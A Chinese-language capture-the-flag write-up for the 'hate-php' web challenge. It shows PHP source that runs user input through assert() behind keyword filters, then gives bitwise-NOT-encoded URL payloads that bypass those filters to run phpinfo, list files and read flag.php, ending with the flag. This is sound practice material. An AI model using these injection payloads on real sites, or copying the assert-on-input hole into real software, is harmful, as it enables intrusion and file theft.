2020第五空间web hate-php
Hate-php
技术太差了,还需要努力
<?php
error_reporting
(
0
);
if(!isset(
$_GET
[
'code'
])){
highlight_file
(
__FILE__
);
}else{
$code
=
$_GET
[
'code'
];
if (
preg_match
(
'/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i'
,
$code
)) {
die(
'You are too good for me'
);
}
$blacklist
=
get_defined_functions
()[
'internal'
];
foreach (
$blacklist
as
$blackitem
) {
if (
preg_match
(
'/'
.
$blackitem
.
'/im'
,
$code
)) {
die(
'You deserve better'
);
}
}
assert
(
$code
);
}
preg_match
(
'/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i'
,
$code
过滤了很多东西
可以看出我们需要从 flag.php中读取出 flag
$blacklist
=
get_defined_functions
()[
'internal'
];
最主要的就是绕过这里 $blacklist
=
get_defined_functions
()[
'internal'
];
get_defined_functions()函数它将获取所有已定义的函数,包括内置(internal) 和用户定义的函数。 可通过$arr["internal"]来访问系统内置函数, 通过$arr["user"]来访问用户自定义函数
这里吧内置函数 加如到了 blacklist中 ,我们就需要绕过这个
https://www.cnblogs.com/yesec/p/12450269.html 这里有个相同的绕过手法
构造 (phpinfo)();这样的写法
我们取反绕过
得到 %8F%97%8F%96%91%99%90
构造payload ?code=(~%8F%97%8F%96%91%99%90)()
分号被过滤了 那我们就去掉分号测试
这里去掉分号就可以了 在其他环境是否可行并未验证
成功弹出phpinfo页面
那我们同样的就可以浏览目录
使用print_r(scandir('.'))来进行列目录
构造payload:
?code=(~%8F%8D%96%91%8B%A0%8D)((~%8C%9C%9E%91%9B%96%8D)((~%D1)))
接下来我们读取flag.php
使用readfile(‘flag.php’) 来读取flag.php
Payload:
/?code=(~%8D%9A%9E%9B%99%96%93%9A)((~%99%93%9E%98%D1%8F%97%8F))
得到flag
flag{ecee9b5f24f8aede87cdda995fed079c}